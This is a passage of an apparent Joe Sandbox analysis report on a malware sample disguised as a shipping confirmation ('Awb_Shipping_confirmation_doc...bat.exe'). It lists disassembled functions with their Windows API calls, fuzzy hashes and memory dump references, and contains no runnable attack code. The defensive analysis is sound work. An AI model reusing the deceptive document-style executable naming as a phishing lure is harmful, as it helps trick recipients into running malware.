Instruction Fuzzy Hash: A4816571D04228DBDF24CFA8C8447ADBBB0FF44315F20856AD856BB281C7786A86DF45

Function 0040703F Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
Instruction ID: 95d77a19c0962547fc3f67c13c4944abdc30b9b20558c44938f244593de0d4a6
Opcode Fuzzy Hash: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
Instruction Fuzzy Hash: 49713471D04228CBDF24CFA8C8847ADBBB1FF48305F15806AD856BB281C7386986DF45

Function 0040715D Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
Instruction ID: 33b9de73c5357426475d1ecb6718d507a7f793f52192090568aa5f1be2fe3f26
Opcode Fuzzy Hash: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
Instruction Fuzzy Hash: D8714671E04228CBDF28CF98C8847ADBBB1FF44305F15856AD856BB281C7786986DF45

Function 004070A9 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
Instruction ID: eebb37c65e2131d6119e05978ba22ffeb7e1a1a57c5d17d20a151e235b5fbeda
Opcode Fuzzy Hash: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
Instruction Fuzzy Hash: DD714771E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7786A86DF45

Function 004020DD Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108

Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: cd3871a4674ab2d20781c98e55c83c75f0414bc3aa5ab025748cc012411ec63e
Instruction ID: d5d67dfdf4745362115819af7549d82072a8f7f049e0964222285d8f4f4a232d
Opcode Fuzzy Hash: cd3871a4674ab2d20781c98e55c83c75f0414bc3aa5ab025748cc012411ec63e
Instruction Fuzzy Hash: ED215031904108EADF11AFA5CE49A9E7A71FF44359F20413BF201B91E1CBBD8982AA5D

Function 00401BA0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(006E29C8), ref: 00401C10
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22

Strings

Call, xrefs: 00401BC7, 00401BCD, 00401BE7

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: 1123cc6a0f383144ca4e0a98b12c217c63afdee534dd3928be857bb34d6716f0
Instruction ID: 755843c12eef3f61fe3821796784c52372e38f60d99e915cd62482290075d307
Opcode Fuzzy Hash: 1123cc6a0f383144ca4e0a98b12c217c63afdee534dd3928be857bb34d6716f0
Instruction Fuzzy Hash: 7D210872904254DBDB20FBA4CE84A5E73B8AB04718715093FF542F32D0C6B89C418BDD

Function 004025A3 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,00000000,00000011,00000002), ref: 00402602

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 0dba00214060772b269aec70c88b8c4dcefe1b236ecbe69e4432b09e807f707b
Instruction ID: 0e7c906900fe31acaf330cad7c7adc7318663c551a7f251ed3955534a0ac5e15
Opcode Fuzzy Hash: 0dba00214060772b269aec70c88b8c4dcefe1b236ecbe69e4432b09e807f707b
Instruction Fuzzy Hash: 3D017171904205ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB84E41976D

Function 00403376 Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00008001,00000000,00000000,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 0040339B

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
Instruction ID: 810e563441ec60ddb2e304251acab09d4dc6a46a8481b8ea59e7f14a092257d1
Opcode Fuzzy Hash: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
Instruction Fuzzy Hash: E231B170200209BFDB129F59DD44E9A3FA9EB04355F10843AF904EA191D3788E51DBA9

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
Instruction ID: 4cdfa14fa51073ec67c7732ce5b449902c092ffb61bdcee16cd85da0f6320b18
Opcode Fuzzy Hash: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
Instruction Fuzzy Hash: 0F01F4327212209BE7295B389D05B6B3698E710354F10863FF855F6AF1DA78CC429B4C

Function 00402439 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
RegCloseKey.ADVAPI32(00000000), ref: 00402464

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: bb53019bc6b0262c1a7ba30a0e76d60d513ae05c0bd0953298f21ea634c4095c
Instruction ID: 5f3bbf62c25f8db8e4007b741f5cecc6338069a28fa7be666feaa9c5da8c1564
Opcode Fuzzy Hash: bb53019bc6b0262c1a7ba30a0e76d60d513ae05c0bd0953298f21ea634c4095c
Instruction Fuzzy Hash: FCF06232A04520ABDB10BBA89A8DAEE62A5AF54314F11443FE542B71C1CAFC4D02976D

Function 00405BD6 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C18
GetLastError.KERNEL32 ref: 00405C26

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
Instruction ID: c951f985784cdd1ce4bfd292213bf749a6eab04c72170860fc3503b4537cd402
Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
Instruction Fuzzy Hash: 67F0F4B0C04209DAEB00CFA4D9487EFBBB4FB04309F00842AD541B6281DBB882488BA9

Function 00405C65 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
Instruction ID: 40cf053be3b9956ee682ea3cdb0c0f8171e7446c395677da6238e6dd92eb787c
Opcode Fuzzy Hash: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
Instruction Fuzzy Hash: A4E0BFB4600219BFFB109B64EE49F7B7B7CEB00648F418425BD14F2551D77498149A7C

Function 00406A76 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3

Part of subcall function 00406A06: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
Part of subcall function 00406A06: wsprintfW.USER32 ref: 00406A58
Part of subcall function 00406A06: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A6C

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
Instruction ID: b294046d3e4dddd9dd595f306a5883e4a37f4b9faaa0bea25d2c73fe5553ab8f
Opcode Fuzzy Hash: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
Instruction Fuzzy Hash: DFE08636704610AAD610BA709E48C6773A89F86710302C83FF546F6140D738DC32AA79

Function 00406172 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,80000000,00000003), ref: 00406176
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15

Function 00405C30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36
GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C44

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
Instruction ID: 9ee767d7bb24d12ef4013e29ffdbd8bf560f6e5ed3fd997729cc5c4a92c9c995
Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
Instruction Fuzzy Hash: 4EC08C30208601DAEA040B30DE08F073A50BB00340F214439A082E40A4CA308004CD2D

Function 00402896 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028B4

Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6

Memory Dump Source

Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
